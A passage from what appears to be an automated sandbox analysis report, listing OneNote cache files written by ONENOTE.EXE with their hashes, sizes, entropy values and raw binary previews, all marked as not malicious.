SHA-512:	25A377D46F7460C31B955F341F246216DA88DCAE174D039FE6B1DB26064038847E9F6594F0056E74DFF59EF14FF28B17643C72900FBFCA49A863C090AB00C27A
Malicious:	false
Preview:	2...>................................................................................................................................................................................................................kG.....N..............[K..E...S.....kG.....N..........[K..E...S..................................................................................................%.....\.......N."....................................................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...............................c..,........................ ..$.................... ..$p...............>..M..(.M..........KD..D.$.H.......N...^............................................................................................................KD..D.$.H...............................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5233474523157299
Encrypted:	false
SSDEEP:	6:jhzc2lYFVnIgqrMyLx8Olu3hl1bBd6ww1EsABd6M:jRc2lYFVIRgV3P1tfQEDT
MD5:	917A65D90BCD5A3FDC5205E66033CE41
SHA1:	1E1F521E0BDFA6A5458CCCA056F05D2A57EB9C22
SHA-256:	C7CA85ABA05E8E473E27588ECF06528F354B508D9FC9A629E73D014263E40029
SHA-512:	C1471ABBCBE162EEE9C008CC216B8780CA6C2F8BC164A57275B97D5A5B11431A13AE50B9A8899FC233BB885C8804CE8BC34C7DB29F98093481FC6FFC9E31F444
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................s-......s-...L....Q.(%.........................s-...L....Q.(%.s-...................................................s-......s-..................................................s-......s-\..............................................................4..1...(...(.......1.0.3.3.................p........._....D.....Y"...........~].>.<nA..w..Ay.....N...^...........................................................................................................~].>.<nA..w..Ay.....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.7307510214359536
Encrypted:	false
SSDEEP:	48:NsWoa6oXMBbkFbGCZtUEwh3XWK983l1N0rdQVrdEr5tXKrZl9:NsdOXMVkBGCZWE43XWK9sl1GRQ5Q56
MD5:	7E98492F0F6DA5373B6AD1316EC4AA84
SHA1:	FB9C47FEB17D525F605BF523ECF30D16AD0A9D78
SHA-256:	D95C7365C3D97C628C6CCB1705CEDF72D58D74A20F9AC0F4A07AC5F85B5BAE17
SHA-512:	5BFEF66FDA3109407A028DBC0C25C069CBB03C2E54146B2BD3EFAE466598202E23574FE55961CC54B4E70F21723CA2DDE05DD1632AA77237DF0C4A57F9884386
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>...........v................................I.......I.qk..B.....LZ<.......<..=......w.`..;<..=......w.`..;<....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................O.x..d........N...^..................E.~.G..?.../.............................................^....I.qk..B.....LZ................O.x..d................O.x..d....*.........<.......<.......<...........................................<..j....<..T.l..<.......<....Q..<....Q..<....>..<.......<.. .3...................;........4...4...4.."..............<...<...<....z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........<.......<......#<..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
Category:	dropped
Size (bytes):	3009
Entropy (8bit):	7.493528353751471
Encrypted:	false
SSDEEP:	48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
MD5:	D9BD80D40B458EDB2A318F639561579A
SHA1:	83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
SHA-256:	509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
SHA-512:	C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''*''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .te..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N..............#..M<\|.2.Y.../QO.x.cTM4......+.F;V.x.de....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........\|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
Category:	dropped
Size (bytes):	2266
Entropy (8bit):	5.563021222358941
Encrypted:	false
SSDEEP:	24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
MD5:	DB8A181E3F0EAD4A9472099E42ED6BE3
SHA1:	92096AF05CC6167B1AA816811A1160B809393FA2
SHA-256:	E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
SHA-512:	A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......\|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~\|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.\|.....5h.y.%.~...G

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.32167306282929
Encrypted:	false
SSDEEP:	48:YuasSoAMpuPtMD0EgKXTjw9aItoVrdQqreWo2BXsFP0h2bJ:YFsxuPOwELXTE9aItsRQyNo2B+
MD5:	4D9E9D612F11B051ACD92C9022207940
SHA1:	EF4A9F827848948529CAB9CB85184A70ECCC9461
SHA-256:	835AA3E6B0D1B2B98F5CFDA5E666BBE6A47F7607CBE3D5CD23B5E9057C3F9B23
SHA-512:	5F84B825D6E6C6CFF2C82416D4906A22A3FF33BFC9ABD7894CDB64EB74F940329325E770F57405465235FAACB93A817A6EB1D9FB01B9B447B7CF1A48C9600929
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.$M......$M........#...$M........#...$M..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............N..$.D.#8dc."g.....N...^.................T...uJ..6\|X..3........f........................................I.qk..B.....LZ.............N..$.D.#8dc."g..........N..$.D.#8dc."g...........$M......$M......$M..........................................$Mj.....$MT.]...$M......$M..B...$MH.....$M..B...$M..>.).$M..J...................;........4...4...4.."...............$M..$M..$M..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........$M......$M....#.$M............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	99293
Entropy (8bit):	7.9690121496708555
Encrypted:	false
SSDEEP:	1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
MD5:	EA45266A770EEA27A24A5BB3BE688B14
SHA1:	9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
SHA-256:	EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
SHA-512:	D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
Malicious:	false
Preview:	.PNG........IHDR...-...c............sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.\|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R...<........6...m@..r..j2..HK"\|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n.........#..W.41...5.#.`..I...<.?.\|..+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.355808316744964
Encrypted:	false
SSDEEP:	48:Yu4ns7c909Gxt9g/0EVpydX/+sOY69ScdoVrdQqr4hs9BXUlogZ:YpnsicGxtEP2X8V9SGMRQy469Y
MD5:	3DD53E6BB3D3619C4EB6B53E3AA85ACC
SHA1:	140896D6E1574CEFA60A8C1B86323A4BC0A1840F
SHA-256:	FBD3377268B7AA625BC32D73F75D47803C0717E03306EEBD971DEA5DFB46883D
SHA-512:	83045BF63E6E4DDA6BE0FC6B2310467183A08F083994251488D811A6712943F3755CCA1E263F65E99BD99688BAFC12AA7C2390C2979B6D4FB32E386F15630A06
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ=.s.....=.s...R....gGN.I=.s...R....gGN.I=.s..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............w.Qf....ZPFg......N...^.....................J...a.j@........f........................................I.qk..B.....LZ.............w.Qf....ZPFg...........w.Qf....ZPFg...........=.s.....=.s.....=.s.........................................=.sj....=.sT.]..=.s.....=.s..B..=.sH....=.s..B..=.s..>.)=.s..J...................;........4...4...4.."..............=.s.=.s.=.s..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........=.s.....=.s....#=.s............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
Category:	dropped
Size (bytes):	2898
Entropy (8bit):	7.551512280854713
Encrypted:	false
SSDEEP:	48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
MD5:	7C7D9922101488124D2E4666709198AC
SHA1:	00CC44A1B84D4D94A0ACE8834491EB5F65D04619
SHA-256:	20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
SHA-512:	882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................\| F.. ...j...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.344944829541031
Encrypted:	false
SSDEEP:	96:1ssOcP1XEdwESh1Xxn9qr8RQyRpuztT9ItTaCg:1ssdPkyXV9qr8RJRpu
MD5:	543E0CF2963D774F3EE535A6F7C52BCB
SHA1:	99C70F8132D48E31F5E6417866E3B9F37011527F
SHA-256:	1275ABA59DDF99A571418F485279FC70C6717C571FDF93C37F621785E348B081
SHA-512:	675EB694ADDF101AE06C490547480CF7610880E1C654C5F302894DEA6BC5C607A2F5A0FC18CC394F76ABE34B71B73493CE6FC3FA2DB8165E3CE01EB38DDE1EF1
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ..9.......9o.o&.7........9o.o&.7........9..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............<.(... .q.e.:z....N...^................Fa....A...(U-d........f........................................I.qk..B.....LZ..............<.(... .q.e.:z..........<.(... .q.e.:z...........9.......9.......9...........................................9j......9T.]....9.......9..B....9H......9..B....9..>.)..9..J...................;........4...4...4.."................9...9...9..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........9.......9....#..9............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
Category:	dropped
Size (bytes):	29187
Entropy (8bit):	7.971308326749753
Encrypted:	false
SSDEEP:	768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
MD5:	DF99CAAAB9A7DE97B63343E60A699AB6
SHA1:	B84334135CFB73BC6EF55F85926770D5AC6DFEA8
SHA-256:	74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
SHA-512:	5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;.'.f.5^.....m..<$....8.R.j.D.v..>...dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%..S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..\|D...+...NA....Y.^f.1\|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N......U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.344120179473206
Encrypted:	false
SSDEEP:	96:hes7UgYI+H7EYY6nXJG9gAz0RQyOCbqUCUqUaUPUCDgUxU:hes9YJ4xQXJG91z0RJOe
MD5:	7487ED30F91607E03F39E7917FE8613A
SHA1:	A45156BD9F8663A66A07C401A4DDBF2E23AB5766
SHA-256:	41B7B61B282913F42C188A00DB84985B87125871BF768A552DCC423BFACBDA88
SHA-512:	039F4D673FDFD7A47D2F3F8C0E7EFE7F4FF07EEA10886EB085AFBC09CA63C441B9AC2A9E72957099739B597ECC0429E110F9439FC531F3683A3F8CD4C4117867
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ. j...... j(9.....d..C. j(9.....d..C. j..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............6.r.16...#..QaU....N...^.....................%D.T.w...........f........................................I.qk..B.....LZ............6.r.16...#..QaU........6.r.16...#..QaU.......... j...... j...... j.......................................... jj..... jT.]... j...... j..B... jH..... j..B... j..>.). j..J...................;........4...4...4.."............... j.. j.. j..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.......... j...... j....#. j............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	7.874649683222419
Encrypted:	false
SSDEEP:	96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
MD5:	5D6C1F361BC04403555BE945E28E53FC
SHA1:	00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
SHA-256:	131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
SHA-512:	34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V...S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.\|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.350401840853826
Encrypted:	false
SSDEEP:	48:pJixXBssNyaJ2CDmtIm8EnV5YZXx9OEoFrdQqruggfsBXM3k+aVx:yBsYr2CDm6fEVOZXx9X8RQyafs0O
MD5:	B2C78708EEB911763F075E152B53E719
SHA1:	E9E77EB53D23959F826F194DF6B45715CAE31552
SHA-256:	8CDE3E38723918C5DF9B85DCF2B962369DA5817CC4C238424CA0BEFB69361B81
SHA-512:	2C0684010916A6813B34E6B78B803A0EC70895A14CD8E48D8836268A46A160DF593C12591EE0DCAAFB1FE283D7A8F216F0F8E520250A0E39DAD0B8F2861DC460
Malicious:	false
Preview:	2...>.......V...v...J...................................................................................................................................2...>...2.......v...~............................I.......I.qk..B.....LZLs......Ls.-.........._.Ls.-.........._.Ls...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............f.5^8.....R..R....N...^...............~g...L.H.q....^.........f........................................I.qk..B.....LZ.............f.5^8.....R..R.........f.5^8.....R..R.........Ls......Ls......Ls..........................................Ls.j....Ls.T.]..Ls......Ls...B..Ls.H....Ls...B..Ls...>.)Ls...J...................;........4...4...4.."..............Ls..Ls..Ls...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........Ls......Ls.....#Ls.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
Category:	dropped
Size (bytes):	1717
Entropy (8bit):	7.154087739587035
Encrypted:	false
SSDEEP:	48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
MD5:	943371B39CA847674998535110462220
SHA1:	5CA79B7BD7E0E93271463FAEF3280F1644CBA073
SHA-256:	9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
SHA-512:	812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J....Q...b.Q..Ah....Ah..b.Ah..b.PZ.(.@z.?.`;2.......................................................Q...b.Q..EZ.(..Z>.G.....`Z+E......J....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.327993359644271
Encrypted:	false
SSDEEP:	48:+swxJpbqorUZRntg3vOJlEKd79MXHSJ69qaeo5rdQqrda0BXJcqq7BYv1UwZg:+sXZ1iGTEKd5MXHSJ69EQRQyw0wI
MD5:	790FA9B5CE471BDB6926A9642BCA0004
SHA1:	9A955F60B6C73249391ABA336FEC73991E0BCDAA
SHA-256:	25F8A0F9E5D221AFE15F43C6AA3B465EFBEE3543E53AE4B588E13ECA7A169E62
SHA-512:	4BFAA78A923CCE302E7889560AC0E712D17A23FB4373B2957B95C209335B6183A9BD8A17A29CE6FE228F0C52A70A4C3818DE63A2CD83C557423CE97E05449518
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ.D:......D:4......X..m...D:4......X..m...D:..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............tp..."....=......N...^....................}K...k:.........f........................................I.qk..B.....LZ..............tp..."....=............tp..."....=............D:......D:......D:..........................................D:j.....D:T.]...D:......D:..B...D:H.....D:..B...D:..>.).D:..J...................;........4...4...4.."...............D:..D:..D:..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........D:......D:....#.D:............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
Category:	dropped
Size (bytes):	3555
Entropy (8bit):	7.686253071499049
Encrypted:	false
SSDEEP:	96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
MD5:	8A5444524F467A45A5A10245F89C855A
SHA1:	ACE68D567B02B68275E0345C86DB1139C0EC1386
SHA-256:	7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
SHA-512:	8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..\|3.........................Q..../c.....f.}8....D..\|k..Z......0..~..c..e..m(...\|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB\|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.291683238275323
Encrypted:	false
SSDEEP:	48:YTsZpRK8U9k5tvmQOd94ElAXZAD9yZGo1rdQqrbwdkWBXwZS990ZZuZJ:MsDBUC5IQnEOX+D9DURQyEd3UZK
MD5:	C157B91C900FF976A9225731E2DD28A6
SHA1:	369A74CAF19665B8A735EF85CDD671C2C88F1C2B
SHA-256:	8575B558CF241913AE6A5CB1BA70A4F4B45B68B1F81DE53E8189FDD6845B7613
SHA-512:	3142CEC26805F7ECAC1ACD96B56B45D3A6B879CD3E52C1CF0C0E0A67850081E45895BC9725CE4C3282E42A252615CF8C95C1D207C11E04ECB823781AC52DD717
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................4.......4.O...1O.S..'.I.......I.qk..B.....LZ.4.O...1O.S..'.4...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................_q.\|.....W......N...^...............Iyx,.8.K.......W........f........................................I.qk..B.....LZ..............._q.\|.....W............._q.\|.....W............4.......4.......4...........................................4.j.....4.T.]...4.......4...B...4.H.....4...B...4...>.).4...J...................;........4...4...4.."...............4...4...4...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........4.......4.....#.4.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
